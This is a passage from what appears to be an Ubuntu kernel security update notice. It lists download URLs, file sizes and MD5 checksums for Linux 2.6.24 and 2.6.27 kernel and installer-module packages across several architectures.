http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:   472422 d08cc1bf2e88df1908f35afc77fd696a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb
  Size/MD5:    70518 751bdd069d86773b5a3cfc67a09b46a4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb
  Size/MD5:    71382 3aa45fd7cdb245416c60a2210066a353
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb
  Size/MD5: 20248150 fad37a976e62eb5c73f906fd44070b5a
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-rt_2.6.24-27.65_i386.deb
  Size/MD5: 18543176 2f3a767f3505c51ebac878d921d3f3d8
http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-xen_2.6.24-27.65_i386.deb
  Size/MD5: 18782962 8a5a3287d174aa7fd1cceb71be94f347

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5:   639434 d3cfd21a90ea311f0b1efa2ac28dfac0
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5:   705462 81a381fb023a0e0074d8cfaa7fca88b8
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_lpia.deb
  Size/MD5:   707532 c6bf8f82d8bbc4e2320343f58629a562
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpia_2.6.24-27.65_lpia.deb
  Size/MD5: 14516344 29b153dcb44d72c1e5862191cb266c6b
http://ports.ubuntu.com/pool/universe/l/linux/linux-image-2.6.24-27-lpiacompat_2.6.24-27.65_lpia.deb
  Size/MD5: 19816106 947ff90add29d1fc18a69145f39341d1

powerpc architecture (Apple Macintosh G3/G4/G5):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   334046 06512921aae848be603af54dc56f72e6
http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   318530 4e8164b49e3ad90d33c9275bd1c7b45d
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    62718 e53308b729496be4a0e343535769c74e
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    73002 10bf1560cb8abc507ea079f6a495f91b
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    41442 a9d6733876fcf91a271eb189eaffcb37
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    47826 1d54194b81d12ac7b00b910f625f7a59
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    89506 1d66e8fc56eb6437f783cb677e6c7061
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   105746 034c14e0418581e1b8b56913246e96de
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    44824 5430e2953cc84d26fd0c8e8c4e323a92
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    40932 93dc2a167cf8ab1d80426dd296997295
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   704830 ef370acc49192e464ef553984e361d88
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   770960 ac691fac4ab28cb6d9627fa6b7a5b773
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   243328 b280fefee27294e988529239616e68fe
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   246310 c1d7e140ca2ba026b6a168c6c9748476
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    69160 665a09e07612701e5c6bc7efee856e5c
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   132586 f0e732beade4d5154e887aaa1b1f3625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    70252 d8f056e2c9d8aabe9acacfbe4e6c9de0
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    77462 d69a84be1856d83b83faf1fa820803f6
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   146272 11a1d0911e3fda9667661975972e08b2
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   165002 c4276844b0ea79946508c0cd3a816541
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   387992 53b23049b6f79a9609349927adec3443
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   350468 694a94354856e10bcc935e2a7ba38a51
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2431460 3a8171d7d1e7e6b37573c6679812d2ae
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  3473330 1037b52b34e3b26b05f68bfafb48850a
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   652854 26483fb509f744914f646c49eb7b4d6c
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5:   657530 98dd4c49966d886237bed19fddb84057
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5:   652742 c9f225771751b175bc9a3d1ccb9b2b91
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 20175388 98b77e06737b717f07a9f436bf292879
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc64-smp_2.6.24-27.65_powerpc.deb
  Size/MD5: 21378902 be6b07df3db6828d5d795954b3ad3c49
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-powerpc_2.6.24-27.65_powerpc.deb
  Size/MD5: 19948474 1a42e203300936a0a6bbd91270ac925d
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_powerpc.deb
  Size/MD5:   697738 b5f3e2a2bf27249b08f44ca708c75305
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   266748 d71a805e23acc800f21449d312975e04
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   307732 90c6243c8802cdc121bdf92145f7dc17
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   192250 b114447f81aee3dfc51a3c40f2015d66
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   201688 94056840984e621b385099d261ce2420
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   272012 b6790aca1401ed43b8c04befaef9af51
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   306006 50b970f3b69d4eda6d3e59353c9db152
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1807766 ec7ddb35df35bb103f7fa00168c827cd
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  2119612 ee4db3863509964860b0a24a9a6d5951
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   235186 b6a1a89f7279818e17cac5d5b3a8b86e
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   225404 baf5ea09bdbab57626dee3afb306a39b
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   170438 b6bae0ce9350745a5c5ba8d969ae34ef
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   199752 9d4225f0960410c78279f61aa02471da
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   117942 e88c2b968d47d71ef068dcb5abd4d9fd
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   139272 5f4576b20a9dc27976d521d0942ad0c9
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    45372 918120c1bd011bbbb8b95529c0978f09
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    46836 10f5de3e02406e28d373098a6613860b
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    51132 610f6b349ffcb68ca7f58dc7928a7558
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    60292 9b17fdf2d2aa9cbcfd3dbfb1bfc3af41
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    74186 053cc99e1839e95e6e48198a187c3e48
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    87220 b730de88a2ee8d0b1503d2ee30f13e69
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76092 0a6aab3a33606ec7e97d474de29a47db
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    30230 76c4d08ce66715d75db459c89405a0fb
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:     8486 80580934d5e5f6909c396732bedf2055
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    10030 4e52e0e6b321b919404ffa406ccc2da1
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    57438 24e1b5d61bcbe2b2faf9f31d9b6f7d3b
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    68746 1b541e58e95b8022b84e7d050db97ecc
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   101184 97ff0fdbf93ef2526b1a97b962592e37
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   147834 eb62d695f6da016ae938924414bd15ed
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1565722 3bf6b2bd7ef98c403f8cedf220978814
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:  1514590 307c47dc707e3c96384e6ce043c745be
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    76672 863a1d5aaef2e7d8f5ec43318a2b3f7a
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    85976 b6bedff825f704ceb1269488d698bfbf
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    12702 cc2c9e83433b8f4092748b933292a46b
http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    14560 60c8e6f2c5425b8bfea2cbee00dd50c2
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   449632 ff75fd65c13af279e6652e0d09505887
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   504134 364077fbb2c074eb8852249a757b89ae
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:    83682 bcafd92384fdae95293c310f83443303
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb
  Size/MD5:   108840 2254f5416b8a0cd8d1cd52a57d7a064a

sparc architecture (Sun SPARC/UltraSPARC):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    59570 0a8a1c6f109f6620c74d81880a6836ef
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    71732 e29b3839ae80a5cc8b8ca1756569e0bb
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    42454 35c72663f93201098e40f0fc36232ccc
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    91776 d7f14f387c9d325ba87761a2da581b5c
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   587190 a4606a71370a3dec9dc6a3aba35ec115
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   171076 2f15afec1e2aa78035659ac46b010cb3
http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    22356 aa2c6396604a45f318881df2e562f625
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    46058 5633652b0f71f9e2098ce2798e29269f
http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   152976 d7cbf92b5ae85f379d0335c693ccc256
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  2135270 f05d76791e5538fa887f7731d170dc58
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5:   565588 5d632e2a56604e4feff30e310f17f024
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5:   563928 4b591c5db77c0f5bc41ffff32a14ee31
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64-smp_2.6.24-27.65_sparc.deb
  Size/MD5: 14098262 0170c4f2c460270add65ba17eb7acfd0
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.24-27-sparc64_2.6.24-27.65_sparc.deb
  Size/MD5: 13830862 e4b6c695ad5b3e4ad0b428947b4fd388
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_sparc.deb
  Size/MD5:   752654 6e9b50c2f72a60edf4df6e51d5448cc7
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   270064 879ee6667df636551d565e10ae5162fd
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   190360 388a92b9849a34e99f6a3d2817ca9b05
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   263030 82e8bd5f9f922af935f6f787942f4b2f
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1386520 98436d21f7255a6c923b50900bd2de4d
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   175444 37239b1899dd449d5b4985163c46d678
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   122106 1b86f75278b7fab22bbffd2c0010eef5
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    40398 81325db98acd64573c100455f0cb5289
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    48060 dd1b8744fcecf5959d2dac4a23b8cd34
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     8698 a2a5a2941546e0137d8c57a38ba9ab2f
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    60516 08d388a60ac9be5c7d80d479f94fd4aa
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   106838 b350cddddb73537859dce8203c49ac1d
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:  1002034 0756e59f467bdefbc26dcb06a6201457
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:     9518 7bf2df83ac5364fef90bf13ea616e7e3
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:   391514 9e98f9f4757387d261d6c7a1e8c7d61d
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb
  Size/MD5:    75924 b375f2838ce3f024a9f2b58d02f9d98e

Updated packages for Ubuntu 8.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.diff.gz
  Size/MD5:  3279295 99a1653c9f3eb96475ee9776faff3701
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27-17.45.dsc
  Size/MD5:     2761 3b7c2f9d1b970a69db9a1c2c2bd5d95c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.27.orig.tar.gz
  Size/MD5: 63721466 482b04f680ce6676114ccfaaf8f66a55

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc-2.6.27_2.6.27-17.45_all.deb
  Size/MD5:  3492310 1dbaf1873425d41dfce3b359fc95728e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17_2.6.27-17.45_all.deb
  Size/MD5:  5906568 e4cb3deaf39ad7c3917d33f0f1082a40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.27_2.6.27-17.45_all.deb
  Size/MD5: 52050112 2852d57c251b525e97d6ba66a94f1be5

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/acpi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36530 ae958becd299698d5f30f722eb07cde7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   265218 1de0174009daaf9e0d3fb8f8e737fa40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    53438 46087922e5b4128b6a5f52dcacfbf840
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    43030 e25c2b8fbd4f46654a1ebc6089ef31bc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    52344 4c16a22c0fe8f2a967f1503953ed5f8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    89844 4cc23c275cc1fd6621ac977881b91345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    38180 24f5566a9c89334d394fb48d7c3d4949
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   677070 84220f4d0562b59edd2f0865120d4494
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   158618 edbaf560c5847b8f520ad94cd3f8d2d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    46346 90f299bb91f23a67e0811ae8e0472e70
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   154240 3ccfee605d2ef5a5e87aeb71320b337b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   313106 896f96e4eb01ff9381aaa78b6e1dc72d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  2604320 b50756ed8aeeee4a72873b8c60df10b6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5:   663304 ef966b97630e8096fcf279d6c43b3960
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5:   662184 599a4bf3bad78733d35ad1b4a5601a25
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-generic_2.6.27-17.45_amd64.deb
  Size/MD5: 23073032 96da11b5c1a75a1694b4047c1a71b091
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-server_2.6.27-17.45_amd64.deb
  Size/MD5: 23071096 162a682066d9c7d90df92c975698b2cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.27-17-virtual_2.6.27-17.45_amd64.deb
  Size/MD5: 10479836 39042ef6e7f9049837b4d137450dc41a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.27-17.45_amd64.deb
  Size/MD5:   675844 3d711e518906ef37120bccabeaa1da2d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   434926 cc27207ed63847b17eab47e1978c98fd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   186500 940e6b351f4975369720543184596a04
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   275594 b525586af57630fd8b4e098cef404ad9
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1810688 13f3abe5b38ff8a704c985dc8f3275b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   151324 d883249df4fb86d6d9d1146db5fa1020
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   194282 ee6a6162a8b0615e73a89978fcb9d172
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   168150 696ed64f02936c7200cc9a468302de40
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    36428 ff94b9ab68b2108fd9d1d2475c211725
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    83436 3dceac801e8b0405790e1a28c960183f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    71992 2b936af85a4eceb6312ad7ef93a18c88
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    23240 1d34a195f16d39f7895a2bf36281a6c8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:     9012 454b1c03d70fbf4a917ff2431b6b4f2b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    68544 cd2e39978716c3448e54d6862877957c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:   110302 ecb1005946c139f2340aaee3e80cd152
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:  1276186 d93285c15892be57cfb76798c746f88d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
  Size/MD5:    47602 d2039335dc8bb4104fbb473b5ada0d96
http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb
